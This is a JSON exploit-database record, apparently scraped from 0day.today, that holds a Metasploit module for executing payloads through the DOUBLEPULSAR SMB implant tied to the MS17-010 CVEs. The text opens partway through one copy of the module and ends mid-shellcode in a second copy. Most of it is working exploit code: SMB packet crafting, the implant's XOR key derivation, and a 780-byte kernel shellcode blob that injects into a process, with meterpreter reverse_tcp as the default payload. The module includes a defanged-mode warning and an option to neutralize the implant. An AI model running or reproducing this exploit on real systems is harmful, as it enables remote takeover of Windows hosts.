make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-07] #"}, "lastseen": "2021-09-07T06:18:11", "differentElements": ["sourceData"], "edition": 9}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "9e4ea3d15dcf81f3ffd018c1f9412e52", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-07T22:13:58", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27803"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "exploitdb", "idList": ["EDB-ID:42031", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96707", "SMNTC-96705", "SMNTC-96706", "SMNTC-96703", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0144", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-09-07T22:13:58", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-09-07T22:13:58", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" 